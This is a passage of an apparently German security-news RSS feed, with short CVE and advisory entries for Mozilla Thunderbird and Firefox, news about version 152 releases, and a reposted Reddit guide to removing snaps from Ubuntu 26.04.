<description><![CDATA[A vulnerability labeled as critical has been found in Mozilla Thunderbird up to 102.1. Affected by this vulnerability is the function PK11_ChangePW. The manipulation results in use after free.

This vulnerability is cataloged as CVE-2022-38476. The attack may be launched remotely. There is no exp...]]></description>
<link>https://tsecurity.de/de/3615858/sicherheitsluecken/cve-2022-38476-mozilla-thunderbird-up-to-1021-pk11changepw-use-after-free-bug-1760998-euvd-2022-41059/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615858/sicherheitsluecken/cve-2022-38476-mozilla-thunderbird-up-to-1021-pk11changepw-use-after-free-bug-1760998-euvd-2022-41059/</guid>
<pubDate>Mon, 22 Jun 2026 16:56:43 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 102.1</a>. Affected by this vulnerability is the function <code>PK11_ChangePW</code>. The manipulation results in use after free.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2022-38476">CVE-2022-38476</a>. The attack may be launched remotely. There is no exploit available.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[Ubuntu 26.04 LTS - say goodbye to snaps]]></title>
<description><![CDATA[Love Ubuntu but F*** SNAPS, GOODBYE!  You can strip snaps out of 26.04 LTS and continue humming along. Here's the steps, taken from a YouTube video I came across, but I've updated the steps as below.  NOTE - these MUST be executed in the order I have written here due to dependencies and related h...]]></description>
<link>https://tsecurity.de/de/3611464/linux-tipps/ubuntu-2604-lts-say-goodbye-to-snaps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3611464/linux-tipps/ubuntu-2604-lts-say-goodbye-to-snaps/</guid>
<pubDate>Sat, 20 Jun 2026 02:08:39 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p><strong>Love Ubuntu but F*** SNAPS, GOODBYE!</strong> </p> <p><strong>You can strip snaps out of 26.04 LTS</strong> and continue humming along. Here's the steps, taken from a YouTube video I came across, but I've updated the steps as below. </p> <p>NOTE - these MUST be executed in the order I have written here due to dependencies and related hierarchies. Be patient with the snap removal section as some commands take a few moments to process. </p> <p>Test with a VM first if you're worried, don't run on your live install unless you have a snapshot handy. Copy-paste this into a text file for better readability. </p> <p>Install Flatpak binary:<br> sudo apt install flatpak </p> <p>Gnome Software Center &amp; Flatpak Plugin install:<br> sudo apt install --no-install-recommends gnome-software </p> <p>Install Flatpak Plugin:<br> sudo apt install gnome-software-plugin-flatpak </p> <p>Then we add add Flathub Repo:<br> flatpak remote-add --if-not-exists flathub <a href="https://dl.flathub.org/repo/flathub.flatpakrepo">https://dl.flathub.org/repo/flathub.flatpakrepo</a> </p> <p>Reboot your system:<br> sudo reboot </p> <p>After reboot, install a browser e.g.<br> flatpak install flathub io.github.ungoogled_software.ungoogled_chromium </p> <p>Now we neeed to add PPAs, example applications:<br> KeepassXC:<br> sudo add-apt-repository ppa:phoerious/keepassxc </p> <p>Firefox ESR and Thunderbird stable builds:<br> sudo add-apt-repository ppa:mozillateam/ppa </p> <p>LibreOffice:<br> sudo add-apt-repository ppa:libreoffice/ppa </p> <p>VS Codium (I prefer this OSS version, no MS telemetry. If the code here stuffs up, goto the Debian/Ubuntu section on <a href="https://vscodium.com/">https://vscodium.com/</a> and copy from there)<br> wget -qO - <a href="https://gitlab.com/paulcarroty/vscodium-deb-rpm-repo/raw/master/pub.gpg">https://gitlab.com/paulcarroty/vscodium-deb-rpm-repo/raw/master/pub.gpg</a> \ </p> <p>| gpg --dearmor \ </p> <p>| sudo dd of=/usr/share/keyrings/vscodium-archive-keyring.gpg </p> <p>echo -e 'Types: deb\nURIs: <a href="https://download.vscodium.com/debsnSuites:">https://download.vscodium.com/debs\nSuites:</a> vscodium\nComponents: main\nArchitectures: amd64 arm64\nSigned-by: /usr/share/keyrings/vscodium-archive-keyring.gpg' \ </p> <p>| sudo tee /etc/apt/sources.list.d/vscodium.sources </p> <p>Firefox + Thunderbird preparations:<br> Preparation for Thunderbird:<br> sudo nano /etc/apt/preferences.d/mozillateam-ppa </p> <p>Add these 6 lines in the file:<br> Package: thunderbird*<br> Pin: release o=LP-PPA-mozillateam<br> Pin-Priority: 1001<br> Package: thunderbird*<br> Pin: release o=Ubuntu<br> Pin-Priority: -1 </p> <p>Now that we've prepared flatpak, we can do the snap uninstall:<br> snap list </p> <p>This will show columns in its output, the snaps are on the far left. </p> <p>Here is the standard list and snap remove you'll see in Ubuntu 26.04: </p> <p>sudo snap remove firefox<br> sudo snap remove gtk-common-themes<br> sudo snap remove gnome-46-2404<br> sudo snap remove snapd-desktop-integration<br> sudo snap remove snap-store<br> sudo snap remove firmware-updater<br> sudo snap remove gtk-common-themes<br> sudo snap remove bare<br> sudo snap remove thunderbird<br> sudo snap remove desktop-security-center<br> sudo snap remove mesa-2404<br> sudo snap remove prompting-client<br> sudo snap remove core24<br> sudo snap remove snapd </p> <p>Then check the list again with snap list, it should be empty. </p> <p>We need to deactivate deactivate snapd.socket:<br> sudo systemctl disable --now snapd.socket </p> <p>Then we stop snapd:<br> sudo systemctl stop snapd </p> <p>Now we disable snapd:<br> sudo systemctl disable snapd </p> <p>Then we mask snapd so the OS doesn't try to reuse it:<br> sudo systemctl mask snapd </p> <p>And we delete snapd:<br> sudo apt purge snapd -y </p> <p>We mark snap so the OS doesn't try to reuse it:<br> sudo apt-mark hold snapd </p> <p>Next we perform snap fs cleanup:<br> sudo rm -rf ~/snap<br> sudo rm -rf /snap<br> sudo rm -rf /var/snap<br> sudo rm -rf /var/lib/snapd </p> <p>We also need to prevent prevent snap reinstall:<br> sudo nano /etc/apt/preferences.d/nosnap.pref </p> <p>We add these 3 lines:<br> Package: snapd<br> Pin: release a=*<br> Pin-Priority: -10 </p> <p>Next we perform an apt refresh:<br> sudo apt update </p> <p>Install Firefox ESR &amp; Thunderbird:<br> sudo apt update &amp;&amp; sudo apt install firefox-esr thunderbird -y </p> <p>Install VSCodium:<br> sudo apt update &amp;&amp; sudo apt install codium </p> <p>And that's that, aside from other applications you want to add. Now you're snap-free on Ubuntu LTS 26.04 :)</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/The_Hubster"> /u/The_Hubster </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1uagk9a/ubuntu_2604_lts_say_goodbye_to_snaps/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uagk9a/ubuntu_2604_lts_say_goodbye_to_snaps/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (dracut), Debian (chromium, firefox-esr, and thunderbird), Fedora (chromium, firefox, nss, ocserv, ongres-scram, ongres-stringprep, perl-Archive-Tar, perl-GD, perl-HTTP-Daemon, perl-Net-Statsd, restic, singularity-ce, util-linux, and vorbis-tools), M...]]></description>
<link>https://tsecurity.de/de/3610513/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610513/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 19 Jun 2026 15:25:30 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (dracut), <b>Debian</b> (chromium, firefox-esr, and thunderbird), <b>Fedora</b> (chromium, firefox, nss, ocserv, ongres-scram, ongres-stringprep, perl-Archive-Tar, perl-GD, perl-HTTP-Daemon, perl-Net-Statsd, restic, singularity-ce, util-linux, and vorbis-tools), <b>Mageia</b> (gstreamer1.0-*, libupnp, luajit, opensc, and ruby-rack), <b>SUSE</b> (curl, dnsmasq, ffmpeg-4, frr, google-osconfig-agent, java-1_8_0-ibm, kernel, krb5, kubernetes-old, ldns, liburiparser1, openvswitch, rootlesskit, strongswan, traefik, and trivy), and <b>Ubuntu</b> (ldns, libheif, libnet-cidr-lite-perl, lxd, tomcat11, and vim).]]></content:encoded>
</item>
<item>
<title><![CDATA[DSA-6351-1 thunderbird - security update]]></title>
<description><![CDATA[Security issues were discovered in Chromium which could result
in the execution of arbitrary code, denial of service, or information
disclosure.


https://security-tracker.debian.org/tracker/DSA-6351-1]]></description>
<link>https://tsecurity.de/de/3609657/unix-server/dsa-6351-1-thunderbird-security-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609657/unix-server/dsa-6351-1-thunderbird-security-update/</guid>
<pubDate>Fri, 19 Jun 2026 10:00:50 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security issues were discovered in Chromium which could result
in the execution of arbitrary code, denial of service, or information
disclosure.

<p>
<a href="https://security-tracker.debian.org/tracker/DSA-6351-1">https://security-tracker.debian.org/tracker/DSA-6351-1</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in thunderbird (Debian)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3609438/unix-server/security-mehrere-probleme-in-thunderbird-debian/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609438/unix-server/security-mehrere-probleme-in-thunderbird-debian/</guid>
<pubDate>Fri, 19 Jun 2026 07:31:03 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in mozilla-thunderbird (Slackware)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3606728/unix-server/security-mehrere-probleme-in-mozilla-thunderbird-slackware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606728/unix-server/security-mehrere-probleme-in-mozilla-thunderbird-slackware/</guid>
<pubDate>Thu, 18 Jun 2026 07:46:20 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-36319 | Mozilla Thunderbird up to 102 CSS access control (Bug 1737722 / EUVD-2022-39035)]]></title>
<description><![CDATA[A vulnerability was found in Mozilla Thunderbird up to 102. It has been classified as critical. This issue affects some unknown processing of the component CSS Handler. The manipulation leads to improper access controls.

This vulnerability is referenced as CVE-2022-36319. Remote exploitation of ...]]></description>
<link>https://tsecurity.de/de/3604449/sicherheitsluecken/cve-2022-36319-mozilla-thunderbird-up-to-102-css-access-control-bug-1737722-euvd-2022-39035/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604449/sicherheitsluecken/cve-2022-36319-mozilla-thunderbird-up-to-102-css-access-control-bug-1737722-euvd-2022-39035/</guid>
<pubDate>Wed, 17 Jun 2026 12:38:44 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 102</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. This issue affects some unknown processing of the component <em>CSS Handler</em>. The manipulation leads to improper access controls.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2022-36319">CVE-2022-36319</a>. Remote exploitation of the attack is possible. No exploit is available.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[Hauptsächlich Produktpflege: Thunderbird 152 erhält Unter­stützung für Sicherheits­ge­räte]]></title>
<description><![CDATA[Thunderbird 152 konzentriert sich auf zahlreiche Fehlerkorrekturen und kleinere Verbesserungen. Neue Funktionen fallen zwar überschaubar aus, sollen aber die Einrichtung von Konten vereinfachen und die Sicherheit erhöhen. Darüber hinaus behebt Mozilla mehrere Sicherheitslücken, darunter 12 als ho...]]></description>
<link>https://tsecurity.de/de/3604336/it-nachrichten/hauptsaechlich-produktpflege-thunderbird-152-erhaelt-unterstuetzung-fuer-sicherheitsgeraete/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604336/it-nachrichten/hauptsaechlich-produktpflege-thunderbird-152-erhaelt-unterstuetzung-fuer-sicherheitsgeraete/</guid>
<pubDate>Wed, 17 Jun 2026 12:02:48 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://pics.computerbase.de/1/2/3/3/2/2-6a036aba78ce40c5/article-640x360.0dad81e3.jpg"><p>Thunderbird 152 konzentriert sich auf zahlreiche Fehlerkorrekturen und kleinere Verbesserungen. Neue Funktionen fallen zwar überschaubar aus, sollen aber die Einrichtung von Konten vereinfachen und die Sicherheit erhöhen. Darüber hinaus behebt Mozilla mehrere Sicherheitslücken, darunter 12 als hochkritisch markierte.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [hoch] Mozilla Firefox, Firefox ESR und Thunderbird: Mehrere Schwachstellen]]></title>
<description><![CDATA[Ein Angreifer kann mehrere Schwachstellen in Mozilla Firefox, Mozilla Firefox ESR und Mozilla Thunderbird ausnutzen, um beliebigen Code auszuführen, erweiterte Berechtigungen zu erlangen, Speicherbeschädigungen zu verursachen, Sicherheitsmaßnahmen zu umgehen und aus der Sandbox auszubrechen, vert...]]></description>
<link>https://tsecurity.de/de/3604256/it-security-nachrichten/neu-hoch-mozilla-firefox-firefox-esr-und-thunderbird-mehrere-schwachstellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604256/it-security-nachrichten/neu-hoch-mozilla-firefox-firefox-esr-und-thunderbird-mehrere-schwachstellen/</guid>
<pubDate>Wed, 17 Jun 2026 11:36:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein Angreifer kann mehrere Schwachstellen in Mozilla Firefox, Mozilla Firefox ESR und Mozilla Thunderbird ausnutzen, um beliebigen Code auszuführen, erweiterte Berechtigungen zu erlangen, Speicherbeschädigungen zu verursachen, Sicherheitsmaßnahmen zu umgehen und aus der Sandbox auszubrechen, vertrauliche Informationen offenzulegen, Daten zu manipulieren und Denial-of-Service-Zustände auszulösen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox 152.0: Update schließt 40 Sicherheitslücken und erhöht Komfort]]></title>
<description><![CDATA[Die neue Firefox-Version 152 für Windows, macOS, Linux und Android bringt einige Verbesserungen bei der Benutzung und einen neuen Look für die Einstellungen. Nutzer des integrierten Gratis-VPN können von einer Sommeraktion profitieren. Die Entwickler haben mehr als 40 Schwachstellen behoben. Upda...]]></description>
<link>https://tsecurity.de/de/3604057/it-nachrichten/firefox-1520-update-schliesst-40-sicherheitsluecken-und-erhoeht-komfort/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604057/it-nachrichten/firefox-1520-update-schliesst-40-sicherheitsluecken-und-erhoeht-komfort/</guid>
<pubDate>Wed, 17 Jun 2026 10:32:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Die neue Firefox-Version 152 für Windows, macOS, Linux und Android bringt einige Verbesserungen bei der Benutzung und einen neuen Look für die Einstellungen. Nutzer des integrierten Gratis-VPN können von einer Sommeraktion profitieren. Die Entwickler haben mehr als 40 Schwachstellen behoben. Updates gibt es auch für die ESR-Versionen.</p>



<p>Im <a href="https://www.mozilla.org/en-US/security/advisories/mfsa2026-57/" target="_blank" rel="noreferrer noopener">Sicherheitsbericht MFSA2026-57</a> für Firefox 152 nennt Mozilla über 40 beseitigte Sicherheitslücken, von denen 37 durch externe Sicherheitsforscher entdeckt und gemeldet wurden. Darunter sind 11 Schwachstellen, die Mozilla als hohes Risiko einstuft. Bei vier dieser Lücken drohen Ausbrüche aus der Browser-Sandbox.</p>



<p><a href="https://www.pcwelt.de/article/1197811/die-neuesten-sicherheits-updates.html" target="_blank" rel="noreferrer noopener">▶Die neuesten Sicherheits-Updates</a></p>



<p>Weitere 17 Schwachstellen sind als mittleres Risiko ausgewiesen, der Rest als geringes Risiko. Die drei letzten Einträge im Sicherheitsbericht fassen intern gefundene Sicherheitslücken zusammen, die aus Programmierfehlern bei der Speicherverwaltung resultieren. Die Lücken sind danach gruppiert, welche Programme und Programmversionen betroffen sind.</p>



<h2 class="wp-block-heading toc">Was ist neu in Firefox 152?</h2>



<p>Das mit <a href="https://www.pcwelt.de/article/3098189/mozillas-riesen-update-auf-firefox-149-schliesst-ueber-40-sicherheitsluecken-und-bringt-gratis-vpn.html" target="_blank" rel="noreferrer noopener">Firefox 149</a> eingeführte und in Firefox integrierte Gratis-VPN bietet über den Sommer eine vorübergehend <a href="https://www.pcwelt.de/article/3163831/firefox-gratis-vpn-ohne-limits-und-ein-widget-zur-fusball-wm.html" target="_blank" rel="noreferrer noopener">auf 28 Länder erweiterte Auswahl</a> virtueller Standorte. Das kostenlose VPN ist derzeit nur für Firefox-Nutzer in den USA, Kanada, Großbritannien, Frankreich und Deutschland verfügbar. Es gilt noch als Beta-Version und wird schrittweise freigeschaltet.</p>



<p>Die seit <a href="https://www.pcwelt.de/article/3143899/firefox-151-0-gratis-vpn-mit-standortwahl-und-viele-gestopfte-lucken.html" target="_blank" rel="noreferrer noopener">Firefox 151</a> überarbeitete „Neuer-Tab“-Seite hat inzwischen die angekündigten neuen Hintergrundbilder und neuen Funktionen erhalten, namentlich sechs Widgets wie das Sport-Widget zur Fußball-WM.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a325b4c90a96"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/ffx-wm-bg-widg.webp?w=1200" alt="Firefox Tapeten und Widget zur Fußball-WM" class="wp-image-3163840" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><em>Hintergrundbilder und ein Widget zur Fußball-WM</em></figcaption></figure><p class="imageCredit">fz</p></div>



<p>In privaten Browser-Fenstern können Sie nun die Tracker-Blockade vorübergehend abschalten, wenn die aktuelle Seite nicht richtig funktioniert. Sie können die Adressleiste benutzen, um mit einer sogenannten Schnellaktion jeden Tab in jedem Firefox-Fenster stummzuschalten. Dazu tippen Sie zum Beispiel „Psst“ ein – und es ist Ruhe.</p>



<p>Die Einstellungen kommen mit einer dezent neugestalteten Oberfläche, die Teilbereiche mit Umrahmungen klarer strukturiert. Im Testlabor <em>Firefox Labs</em> wartet neben den schon bekannten Tab-Notizen die experimentelle Unterstützung für das neue Bilddateiformat <a href="https://de.wikipedia.org/wiki/JPEG_XL" target="_blank" rel="noreferrer noopener">JPEG XL</a> (JXL).</p>



<p><strong>Tipp:</strong> Unabhängig davon, dass Sie Ihren Browser stets aktuell halten, sollten Sie die Sicherheit Ihres PCs zusätzlich mit geeigneter Antivirus-Software verbessern. Gute Antivirus-Lösungen stellen wir in „<a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html" target="_blank" rel="noreferrer noopener">Die besten Antivirus-Programme 2025 im Test: So schützen Sie Ihren Windows-PC</a>“ vor. Falls Sie großen Wert auf anonymes Surfen legen, <a href="https://www.pcwelt.de/article/1193534/die-besten-vpn-dienste-im-vergleich.html" target="_blank" rel="noreferrer noopener">sind wiederum gute VPN-Programme einen Blick wert.</a></p>



<h2 class="wp-block-heading toc">Weitere Browser-Updates</h2>



<p>Neben <a href="https://www.pcwelt.de/article/1082606/firefox-50.html" target="_blank" rel="noreferrer noopener" title="Download">Firefox 152.0</a> sind auch die ESR-Ausgaben 140.12.0 und 115.37.0 erhältlich. Letztere gibt es allerdings nur für Windows 7 &amp; 8.1 sowie macOS 10.12 bis 10.14. In den ESR-Versionen haben Mozillas Entwickler diejenigen der oben genannten Schwachstellen behoben, die schon im teils gut abgehangenen Code dieser Browser-Generationen stecken. Das sind nicht wenige: In Firefox 140.12 sind es mindestens 29 und in Firefox 115.37 immerhin noch wenigstens 11 geschlossene Sicherheitslücken. Firefox ESR 115 wird vorerst bis August 2026 (v115.39) weiter mit Sicherheits-Updates gepflegt.</p>



<p>Auch Mozillas Mailer <a href="https://www.pcwelt.de/article/1164952/email-client-thunderbird.html" target="_blank" rel="noreferrer noopener" title="Download">Thunderbird</a> 152.0 und 140.12.0esr sind verfügbar. Darin haben die Entwickler ebenfalls Dutzende Sicherheitslücken beseitigt, die das Mail-Programm von Firefox geerbt hat. Bis zur Veröffentlichung der nächsten Hauptversion Firefox 153 am 21. Juli plant Mozilla wöchentliche Updates zur Fehlerbehebung und um weitere Schwachstellen zu beseitigen.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox: Mozilla führt neue Roadmap für seinen Browser ein]]></title>
<description><![CDATA[MZLA Technologies haben sie für Thunderbird bereits gebracht, nun führt auch die Mozilla Corporation für Firefox eine neue Roadmap ein, wo man sich über die entsprechenden Pläne für die nächsten Monate informieren kann. Mit Firefox Nova als neuem Design ist die größte Änderung, die im Herbst komm...]]></description>
<link>https://tsecurity.de/de/3603860/it-nachrichten/firefox-mozilla-fuehrt-neue-roadmap-fuer-seinen-browser-ein/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603860/it-nachrichten/firefox-mozilla-fuehrt-neue-roadmap-fuer-seinen-browser-ein/</guid>
<pubDate>Wed, 17 Jun 2026 09:08:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><img src="https://www.drwindows.de/news/wp-content/uploads/2026/06/Firefox_Roadmap-720x360.png" class="attachment-single-thumb size-single-thumb wp-post-image" alt="" decoding="async" fetchpriority="high"></div>
<p>MZLA Technologies haben sie für Thunderbird bereits gebracht, nun führt auch die Mozilla Corporation für Firefox eine neue Roadmap ein, wo man sich über die entsprechenden Pläne für die nächsten Monate informieren kann. Mit Firefox Nova als neuem Design ist die größte Änderung, die im Herbst kommen wird, für dieses Jahr bereits klar, aber auch […]</p>
<p>Der Beitrag <a href="https://www.drwindows.de/news/firefox-mozilla-fuehrt-neue-roadmap-fuer-seinen-browser-ein">Firefox: Mozilla führt neue Roadmap für seinen Browser ein</a> erschien zuerst auf <a href="https://www.drwindows.de/news">Dr. Windows</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-36318 | Mozilla Thunderbird up to 102 chrome URL cross site scripting (Bug 1771774 / EUVD-2022-39034)]]></title>
<description><![CDATA[A vulnerability was found in Mozilla Thunderbird up to 102. It has been declared as problematic. Impacted is an unknown function of the component chrome URL Handler. The manipulation results in cross site scripting.

This vulnerability is identified as CVE-2022-36318. The attack is only possible ...]]></description>
<link>https://tsecurity.de/de/3603812/sicherheitsluecken/cve-2022-36318-mozilla-thunderbird-up-to-102-chrome-url-cross-site-scripting-bug-1771774-euvd-2022-39034/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603812/sicherheitsluecken/cve-2022-36318-mozilla-thunderbird-up-to-102-chrome-url-cross-site-scripting-bug-1771774-euvd-2022-39034/</guid>
<pubDate>Wed, 17 Jun 2026 08:48:59 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 102</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. Impacted is an unknown function of the component <em>chrome URL Handler</em>. The manipulation results in cross site scripting.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2022-36318">CVE-2022-36318</a>. The attack is only possible with local access. There is not any exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-36314 | Mozilla Thunderbird up to 102 on Windows Shortcut link following (Bug 1773894 / EUVD-2022-39030)]]></title>
<description><![CDATA[A vulnerability was found in Mozilla Thunderbird up to 102 on Windows. It has been rated as critical. The affected element is an unknown function of the component Shortcut Handler. This manipulation causes link following.

This vulnerability is tracked as CVE-2022-36314. The attack is possible to...]]></description>
<link>https://tsecurity.de/de/3603476/sicherheitsluecken/cve-2022-36314-mozilla-thunderbird-up-to-102-on-windows-shortcut-link-following-bug-1773894-euvd-2022-39030/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603476/sicherheitsluecken/cve-2022-36314-mozilla-thunderbird-up-to-102-on-windows-shortcut-link-following-bug-1773894-euvd-2022-39030/</guid>
<pubDate>Wed, 17 Jun 2026 04:35:52 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 102</a> on Windows. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. The affected element is an unknown function of the component <em>Shortcut Handler</em>. This manipulation causes link following.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2022-36314">CVE-2022-36314</a>. The attack is possible to be carried out remotely. No exploit exists.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[Multiple Vulnerabilities in Mozilla Products Could Allow for Arbitrary Code Execution]]></title>
<description><![CDATA[Multiple vulnerabilities have been discovered in Mozilla products, the most severe of which could allow for arbitrary code execution. Mozilla Firefox is a web browser used to access the Internet.Mozilla Firefox ESR is a version of the web browser intended to be deployed in large organizations.Thu...]]></description>
<link>https://tsecurity.de/de/3603404/sicherheitsluecken/multiple-vulnerabilities-in-mozilla-products-could-allow-for-arbitrary-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603404/sicherheitsluecken/multiple-vulnerabilities-in-mozilla-products-could-allow-for-arbitrary-code-execution/</guid>
<pubDate>Wed, 17 Jun 2026 02:53:33 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Multiple vulnerabilities have been discovered in Mozilla products, the most severe of which could allow for arbitrary code execution. </p><ul><li>Mozilla Firefox is a web browser used to access the Internet.</li><li>Mozilla Firefox ESR is a version of the web browser intended to be deployed in large organizations.</li><li>Thunderbird is a free, open-source email, calendar, and chat application.</li></ul><p>Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird 152.0: Sicherheitsupdates und Feinschliff für den Mail-Client]]></title>
<description><![CDATA[Die Entwickler haben Thunderbird auf die Version 152.0 gehievt. Das Update steht für Windows ab Version 10, macOS ab 10.15 und Linux mit GTK+ 3.14 bereit. Wer zukünftig den hauseigenen Dienst Thundermail nutzt, bekommt nun eine Ein-Klick-Einrichtung spendiert. Zudem lassen...Zum Beitrag: Thunderb...]]></description>
<link>https://tsecurity.de/de/3601635/it-nachrichten/thunderbird-1520-sicherheitsupdates-und-feinschliff-fuer-den-mail-client/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601635/it-nachrichten/thunderbird-1520-sicherheitsupdates-und-feinschliff-fuer-den-mail-client/</guid>
<pubDate>Tue, 16 Jun 2026 13:32:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Entwickler haben Thunderbird auf die Version 152.0 gehievt. Das Update steht für Windows ab Version 10, macOS ab 10.15 und Linux mit GTK+ 3.14 bereit. Wer zukünftig den hauseigenen Dienst Thundermail nutzt, bekommt nun eine Ein-Klick-Einrichtung spendiert. Zudem lassen...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/thunderbird-152-0-sicherheitsupdates-und-feinschliff-fuer-den-mail-client/">Thunderbird 152.0: Sicherheitsupdates und Feinschliff für den Mail-Client</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
